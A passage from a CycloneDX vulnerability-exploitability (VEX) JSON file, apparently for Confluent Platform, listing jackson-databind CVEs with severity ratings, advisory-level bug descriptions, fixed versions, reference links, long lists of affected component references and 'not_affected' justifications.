          "ref": "urn:cdx:31443ff6-1226-453d-ad8c-b0b839b16266/1#9f7aa80a-0e89-401b-a1a6-8eda1e3895f0"
        },
        {
          "ref": "urn:cdx:5a41366f-81c7-467f-a944-b70c66237100/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:e7f0e99d-6e24-448f-8ce9-0d3e2dfc36a2/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:fe1a73d2-1fae-4971-95ae-518949f1e0d6/1#ea5574b5-ad91-4db6-8aa6-c7d7313a218d"
        },
        {
          "ref": "urn:cdx:926511d8-a5cf-4677-a808-9889fa46da3a/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#b6ba5a9e-e1b3-46ec-9028-07c384592d7b"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#f6c512bc-73c5-4628-a0e8-b658b3d7af76"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#ffbc1f98-e2f2-458f-9e4c-63aa02239775"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#f7bfbfb0-9b0c-4b82-8cb9-6dbb084abb35"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#fbb746a9-fd76-4193-abe3-302eac53ca1f"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#dd784541-adc8-40c0-b2fa-9bfeace52539"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#c47be594-1ee9-449a-bd4a-f32127d64866"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#d63084ae-4792-4030-b143-56af2f0b3a07"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#f5f90bd8-21b0-4253-bfa9-385081effac8"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#e957d906-c42e-4fb7-bfc8-c6ff62a11be3"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#b2ce0dc9-ee06-494d-ad4a-0c0663e6c724"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#ab3e6ae4-c670-4606-8cee-cbd23914cb70"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#b9c07a39-fd27-434d-8891-5111f0472387"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#d186c746-922b-43dd-bd1f-d442c97b2304"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#a4a8ed8c-a7d6-41f4-a90f-b12e7b231ac3"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#e297498f-7f89-44c0-92ea-ac5ee12bd35d"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. Confluent Platform does not deserialize untrusted JSON using class-based polymorphic typing; the only class-based sites are the Trogdor test tool (not in the deployed runtime) and the OAuth JwtIssuer selected by trusted broker configuration, so the PolymorphicTypeValidator bypass is not reachable."
      }
    },
    {
      "id": "CVE-2026-54513",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 8.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 8.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        }
      ],
      "cwes": [
        184
      ],
      "description": "jackson-databind contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor. From 2.10.0 until 2.18.8, 2.21.4, and 3.1.4, BasicPolymorphicTypeValidator.Builder.allowIfSubTypeIsArray() allowlists any array type based only on clazz.isArray(), without validating the array's component (element) type against the configured allowlist. A PTV built with allowIfSubTypeIsArray() plus an explicit concrete-type allowlist therefore still permits EvilType[] even though EvilType is not allowlisted. When Jackson deserializes the elements and no per-element type IDs are present, it instantiates the component type directly with no further PTV check, bypassing the allowlist. This vulnerability is fixed in 2.18.8, 2.21.4, and 3.1.4.",
      "recommendation": "Upgrade com.fasterxml.jackson.core:jackson-databind to version 2.18.8, 2.21.4, 3.1.4",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-54513"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36839"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:40895"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:41951"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:43218"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:43400"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:44061"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:44062"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:44063"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:44064"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:44065"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:44066"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:44271"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:48095"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:48151"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:50846"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:50847"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:50848"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:50849"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54435"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54622"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-54513"
        },
        {
          "url": "https://bugzilla.redhat.com/2492010"
        },
        {
          "url": "https://bugzilla.redhat.com/2492015"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492010"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492015"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-54512"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-54513"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-43400.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:40895"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/commit/01d1692c8d0ed03e51a0e3c4f8a9e6908e4931e5"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/commit/24529da29fdf46ff94ca38de9ebf31cd188f5e8e"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/issues/5981"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/issues/5983"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/pull/5984"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/security/advisories/GHSA-rmj7-2vxq-3g9f"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-54513.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-43400.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54513"
        },
        {
          "url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-54513.json"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-54513"
        }
      ],
      "published": "2026-06-23T21:17:02+00:00",
      "updated": "2026-08-14T13:19:03+00:00",
      "affects": [
        {
          "ref": "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6",
          "versions": [
            {
              "version": "2.18.6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:877815a2-1847-4c19-972b-51244bcc82dd/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:a01ea052-e695-444c-befa-01774aabc231/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:50fb2294-f11b-414d-a002-8a150d5f35e2/1#69bb2bc0-1cdc-41bb-94df-6c5233916d74"
        },
        {
          "ref": "urn:cdx:36048e5d-22a1-48a8-8b91-d48b353ddac7/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:ea5ed770-fbdf-4f09-96ee-b278412c62d3/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:88a1e54d-a0a8-41ec-9994-842626967a53/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:0a2a2284-e186-40c4-84a6-9946617cb8d0/1#9fb00781-15ac-441a-8c36-f84d7e0f38e8"
        },
        {
          "ref": "urn:cdx:73af4a37-1312-4900-9e6e-f1a74c04e48b/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:31443ff6-1226-453d-ad8c-b0b839b16266/1#9f7aa80a-0e89-401b-a1a6-8eda1e3895f0"
        },
        {
          "ref": "urn:cdx:5a41366f-81c7-467f-a944-b70c66237100/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:e7f0e99d-6e24-448f-8ce9-0d3e2dfc36a2/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:fe1a73d2-1fae-4971-95ae-518949f1e0d6/1#ea5574b5-ad91-4db6-8aa6-c7d7313a218d"
        },
        {
          "ref": "urn:cdx:926511d8-a5cf-4677-a808-9889fa46da3a/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#b6ba5a9e-e1b3-46ec-9028-07c384592d7b"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#f6c512bc-73c5-4628-a0e8-b658b3d7af76"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#ffbc1f98-e2f2-458f-9e4c-63aa02239775"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#f7bfbfb0-9b0c-4b82-8cb9-6dbb084abb35"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#fbb746a9-fd76-4193-abe3-302eac53ca1f"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#dd784541-adc8-40c0-b2fa-9bfeace52539"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#c47be594-1ee9-449a-bd4a-f32127d64866"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#d63084ae-4792-4030-b143-56af2f0b3a07"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#f5f90bd8-21b0-4253-bfa9-385081effac8"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#e957d906-c42e-4fb7-bfc8-c6ff62a11be3"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#b2ce0dc9-ee06-494d-ad4a-0c0663e6c724"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#ab3e6ae4-c670-4606-8cee-cbd23914cb70"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#b9c07a39-fd27-434d-8891-5111f0472387"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#d186c746-922b-43dd-bd1f-d442c97b2304"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#a4a8ed8c-a7d6-41f4-a90f-b12e7b231ac3"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#e297498f-7f89-44c0-92ea-ac5ee12bd35d"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. the product does not enable class-based polymorphic deserialization (default typing, or @JsonTypeInfo with Id.CLASS/Id.MINIMAL_CLASS) on untrusted input, so the array-subtype PolymorphicTypeValidator bypass is not reachable."
      }
    },
    {
      "id": "CVE-2026-54514",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
        }
      ],
      "cwes": [
        918
      ],
      "description": "jackson-databind contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor. From 2.0.0 until 2.18.8, 2.21.4, and 3.1.4, JDKFromStringDeserializer constructed InetSocketAddress with new InetSocketAddress(host, port), which performs eager DNS name resolution for hostname inputs at deserialization time. An application that binds untrusted JSON into a type containing an InetSocketAddress field issues an attacker-chosen DNS query during readValue, before any application-level validation or connect logic. The fix uses InetSocketAddress.createUnresolved(host, port), deferring DNS to an explicit connect. This vulnerability is fixed in 2.18.8, 2.21.4, and 3.1.4.",
      "recommendation": "Upgrade com.fasterxml.jackson.core:jackson-databind to version 2.18.8, 2.21.4, 3.1.4",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-54514"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-54514"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/commit/1f5a1037b1e9e05920e755cb35f198bcd46667e4"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/pull/5951"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/security/advisories/GHSA-hgj6-7826-r7m5"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54514"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-54514"
        }
      ],
      "published": "2026-06-23T21:17:02+00:00",
      "updated": "2026-06-27T20:55:09+00:00",
      "affects": [
        {
          "ref": "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6",
          "versions": [
            {
              "version": "2.18.6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:877815a2-1847-4c19-972b-51244bcc82dd/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:a01ea052-e695-444c-befa-01774aabc231/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:50fb2294-f11b-414d-a002-8a150d5f35e2/1#69bb2bc0-1cdc-41bb-94df-6c5233916d74"
        },
        {
          "ref": "urn:cdx:36048e5d-22a1-48a8-8b91-d48b353ddac7/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:ea5ed770-fbdf-4f09-96ee-b278412c62d3/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:88a1e54d-a0a8-41ec-9994-842626967a53/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:0a2a2284-e186-40c4-84a6-9946617cb8d0/1#9fb00781-15ac-441a-8c36-f84d7e0f38e8"
        },
        {
          "ref": "urn:cdx:73af4a37-1312-4900-9e6e-f1a74c04e48b/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:31443ff6-1226-453d-ad8c-b0b839b16266/1#9f7aa80a-0e89-401b-a1a6-8eda1e3895f0"
        },
        {
          "ref": "urn:cdx:5a41366f-81c7-467f-a944-b70c66237100/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:e7f0e99d-6e24-448f-8ce9-0d3e2dfc36a2/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:fe1a73d2-1fae-4971-95ae-518949f1e0d6/1#ea5574b5-ad91-4db6-8aa6-c7d7313a218d"
        },
        {
          "ref": "urn:cdx:926511d8-a5cf-4677-a808-9889fa46da3a/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#b6ba5a9e-e1b3-46ec-9028-07c384592d7b"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#f6c512bc-73c5-4628-a0e8-b658b3d7af76"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#ffbc1f98-e2f2-458f-9e4c-63aa02239775"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#f7bfbfb0-9b0c-4b82-8cb9-6dbb084abb35"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#fbb746a9-fd76-4193-abe3-302eac53ca1f"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#dd784541-adc8-40c0-b2fa-9bfeace52539"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#c47be594-1ee9-449a-bd4a-f32127d64866"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#d63084ae-4792-4030-b143-56af2f0b3a07"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#f5f90bd8-21b0-4253-bfa9-385081effac8"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#e957d906-c42e-4fb7-bfc8-c6ff62a11be3"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#b2ce0dc9-ee06-494d-ad4a-0c0663e6c724"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#ab3e6ae4-c670-4606-8cee-cbd23914cb70"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#b9c07a39-fd27-434d-8891-5111f0472387"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#d186c746-922b-43dd-bd1f-d442c97b2304"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#a4a8ed8c-a7d6-41f4-a90f-b12e7b231ac3"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#e297498f-7f89-44c0-92ea-ac5ee12bd35d"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. no attacker-controlled JSON is deserialized into a java.net.InetSocketAddress (the type appears only in networking code, not bound via jackson), so the eager-DNS-resolution SSRF path is not reachable."
      }
    },
    {
      "id": "CVE-2026-54515",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        }
      ],
      "cwes": [
        915
      ],
      "description": "jackson-databind contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor. From 2.8.0 until 2.18.9, 2.21.5, and 3.1.4, in BeanDeserializerBase.createContextual(), per-property @JsonIgnoreProperties exclusions are applied by _handleByNameInclusion(), producing a contextual deserializer whose BeanPropertyMap has the ignored properties removed. The subsequent per-property case-insensitivity block (triggered by @JsonFormat(ACCEPT_CASE_INSENSITIVE_PROPERTIES)) rebuilds from this._beanProperties (the original, unfiltered map) instead of contextual._beanProperties, then overwrites the filtered map \u2014 restoring every property _handleByNameInclusion had just removed. The ignored property becomes writable again. This vulnerability is fixed in 2.18.9, 2.21.5, and 3.1.4.",
      "recommendation": "Upgrade com.fasterxml.jackson.core:jackson-databind to version 3.1.4, 2.18.9, 2.21.5, 2.22.1",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-54515"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-54515"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/commit/0e1b0b211f7a53baa62ba2f4c9bd006c7bf4d5fa"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/issues/5962"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/issues/5964"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/security/advisories/GHSA-5jmj-h7xm-6q6v"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54515"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-54515"
        }
      ],
      "published": "2026-06-23T21:17:02+00:00",
      "updated": "2026-06-29T13:38:59+00:00",
      "affects": [
        {
          "ref": "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6",
          "versions": [
            {
              "version": "2.18.6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:877815a2-1847-4c19-972b-51244bcc82dd/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:a01ea052-e695-444c-befa-01774aabc231/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:50fb2294-f11b-414d-a002-8a150d5f35e2/1#69bb2bc0-1cdc-41bb-94df-6c5233916d74"
        },
        {
          "ref": "urn:cdx:36048e5d-22a1-48a8-8b91-d48b353ddac7/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:ea5ed770-fbdf-4f09-96ee-b278412c62d3/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:88a1e54d-a0a8-41ec-9994-842626967a53/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:0a2a2284-e186-40c4-84a6-9946617cb8d0/1#9fb00781-15ac-441a-8c36-f84d7e0f38e8"
        },
        {
          "ref": "urn:cdx:73af4a37-1312-4900-9e6e-f1a74c04e48b/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:31443ff6-1226-453d-ad8c-b0b839b16266/1#9f7aa80a-0e89-401b-a1a6-8eda1e3895f0"
        },
        {
          "ref": "urn:cdx:5a41366f-81c7-467f-a944-b70c66237100/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:e7f0e99d-6e24-448f-8ce9-0d3e2dfc36a2/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:fe1a73d2-1fae-4971-95ae-518949f1e0d6/1#ea5574b5-ad91-4db6-8aa6-c7d7313a218d"
        },
        {
          "ref": "urn:cdx:926511d8-a5cf-4677-a808-9889fa46da3a/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#b6ba5a9e-e1b3-46ec-9028-07c384592d7b"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#f6c512bc-73c5-4628-a0e8-b658b3d7af76"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#ffbc1f98-e2f2-458f-9e4c-63aa02239775"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#f7bfbfb0-9b0c-4b82-8cb9-6dbb084abb35"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#fbb746a9-fd76-4193-abe3-302eac53ca1f"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#dd784541-adc8-40c0-b2fa-9bfeace52539"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#c47be594-1ee9-449a-bd4a-f32127d64866"
        },
        {
